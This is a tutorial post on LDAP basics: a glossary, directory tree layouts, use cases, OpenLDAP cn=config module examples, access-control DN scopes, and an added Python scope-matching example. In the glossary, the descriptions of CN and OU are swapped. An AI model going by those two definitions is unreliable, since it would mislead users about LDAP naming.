LDAP Basics (to be continued)

Glossary:

ENTRY: a collection of attributes that has a globally-unique DN

DN: Distinguished Name

CN: Common Name. Organizational unit; up to four levels, each level at most 32 characters; may contain Chinese characters

DC: Domain Component

OU: Organizational Unit. User name or server name; up to 80 characters; may contain Chinese characters

O: Organization. Organization name, 3 to 64 characters long

C: Country. Country name, optional, 2 characters long

DIT: directory information tree

Information in LDAP is stored hierarchically in a tree structure, as in the figure below; from top to bottom the levels are country, state, company, department and employee:

Another form is used more and more today, including by FreeIPA: a storage structure based on the Internet domain name. The advantage of this structure is that directory services can be located through DNS:


For example, Barbara Jenson from Figure 1 has the following DN in Figure 2: uid=babs,ou=People,dc=example,dc=com


When should we consider using LDAP? When you need to manage and store data centrally and access it in a standard way, including but not limited to the following scenarios:
  • Machine Authentication
  • User Authentication
  • User/System Groups
  • Address book
  • Organization Representation
  • Asset Tracking
  • Telephony Information Store
  • User resource management
  • E-mail address lookups
  • Application Configuration store
  • PBX Configuration store
  • etc.


Configuration directives:

1. cn=config

Global configuration information

2. cn=module

Module information

Example:

dn: cn=module{0},cn=config
objectClass: olcModuleList
cn: module{0}
olcModuleLoad: /usr/local/lib/smbk5pwd.la

dn: cn=module{1},cn=config
objectClass: olcModuleList
cn: module{1}
olcModulePath: /usr/local/lib:/usr/local/lib/slapd
olcModuleLoad: accesslog.la
olcModuleLoad: pcache.la

3. cn=schema

Schema definitions hard-coded into slapd

ACCESS CONTROL:

The scope can be either base, one, subtree, or children.

base matches only the entry with provided DN

one matches the entries whose parent is the provided DN

subtree matches all entries in the subtree whose root is the provided DN

children matches all entries under the DN (but not the entry named by the DN)

For example, if the directory contained entries named:

0: o=suffix
1: cn=Manager,o=suffix
2: ou=people,o=suffix
3: uid=kdz,ou=people,o=suffix
4: cn=addresses,uid=kdz,ou=people,o=suffix
5: uid=hyc,ou=people,o=suffix

Then:

dn.base="ou=people,o=suffix" matches 2;
dn.one="ou=people,o=suffix" matches 3 and 5;
dn.subtree="ou=people,o=suffix" matches 2, 3, 4, and 5; and
dn.children="ou=people,o=suffix" matches 3, 4, and 5.
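To make the four scopes concrete, here is an added Python example (not from the original post, and not OpenLDAP's own code) that applies the scope rules above to the six entries just listed. It assumes a simplified DN normalization (lower-casing attribute types and values, splitting on unescaped commas) instead of the full RFC 4514 matching rules a real server applies.

```python
import re
from typing import List

# The six entries from the example above (constructed copy; list index = entry number).
DIRECTORY = [
    "o=suffix",
    "cn=Manager,o=suffix",
    "ou=people,o=suffix",
    "uid=kdz,ou=people,o=suffix",
    "cn=addresses,uid=kdz,ou=people,o=suffix",
    "uid=hyc,ou=people,o=suffix",
]

def normalize_dn(dn: str) -> List[str]:
    """Split a DN into its RDNs (leftmost first), splitting only on commas that
    are not escaped with a backslash, and lower-case each RDN.
    Assumption: this stands in for the server's real matching rules."""
    rdns = re.split(r'(?<!\\),', dn)
    out = []
    for rdn in rdns:
        attr, _, value = rdn.partition('=')
        out.append(f"{attr.strip().lower()}={value.strip().lower()}")
    return out

def dn_in_scope(entry_dn: str, base_dn: str, scope: str) -> bool:
    """Return True if entry_dn falls inside the given scope rooted at base_dn."""
    entry, base = normalize_dn(entry_dn), normalize_dn(base_dn)
    # An entry is under the base only if the base is its suffix, RDN by RDN.
    if len(entry) < len(base) or entry[len(entry) - len(base):] != base:
        return False
    depth = len(entry) - len(base)   # 0 is the base entry itself, 1 a direct child
    if scope == "base":
        return depth == 0
    if scope == "one":
        return depth == 1
    if scope == "subtree":
        return True                  # the base entry plus everything below it
    if scope == "children":
        return depth >= 1            # everything below, but not the base itself
    raise ValueError(f"unknown scope: {scope!r}")

def matching_entries(base_dn: str, scope: str) -> List[int]:
    """Indices of DIRECTORY entries matched by dn.<scope>=base_dn."""
    return [i for i, dn in enumerate(DIRECTORY) if dn_in_scope(dn, base_dn, scope)]

if __name__ == "__main__":
    for scope in ("base", "one", "subtree", "children"):
        print(f'dn.{scope}="ou=people,o=suffix" matches', matching_entries("ou=people,o=suffix", scope))
```

Because these are the same scope qualifiers used in slapd's dn.<scope>= access-control clauses, running the function over a directory listing shows exactly which entries a given rule will cover.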
